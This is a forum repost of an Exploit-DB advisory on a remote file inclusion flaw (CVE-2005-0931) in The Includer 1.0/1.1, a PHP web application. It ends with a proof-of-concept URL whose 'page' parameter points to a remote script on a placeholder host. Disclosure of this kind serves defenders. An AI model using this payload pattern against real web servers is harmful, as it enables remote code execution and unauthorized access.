Exploit The Includer 1.0/1.1 - Remote File Inclusion

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
25314
Проверка EDB
  1. Пройдено
Автор
HOANG YEN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-0931
Дата публикации
2005-03-29
Код:
source: https://www.securityfocus.com/bid/12926/info

The Includer is reported prone to a remote file include vulnerability.

The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

All versions of The Includer are considered to be vulnerable at the moment. This BID will be updated when more information becomes available. 

http://www.example.com/index.php?page=http://www.example.com/exploit
 
Источник
www.exploit-db.com

Похожие темы